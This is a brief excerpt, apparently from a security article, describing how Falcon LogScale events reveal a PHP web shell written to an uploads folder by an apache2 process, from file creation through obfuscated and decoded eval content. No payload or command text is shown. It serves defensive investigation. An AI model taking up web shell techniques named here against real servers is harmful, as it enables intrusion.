Advanced Web Shell Detection and Prevention: A Deep Dive into CrowdStrike's Linux Sensor Capabilities

This excerpt demonstrates using Falcon LogScale queries to investigate a PHP web shell: it shows a NewScriptWritten event for /var/www/html/uploads/cache.php written by an apache2 process, ScriptControlDetectInfo containing the obfuscated eval payload, PhpExecuteScript confirming execution of the file, and PhpEvalString providing the decoded eval content that reveals the web shell's logic and authentication checks—giving analysts immediate visibility into the malicious script and its execution context.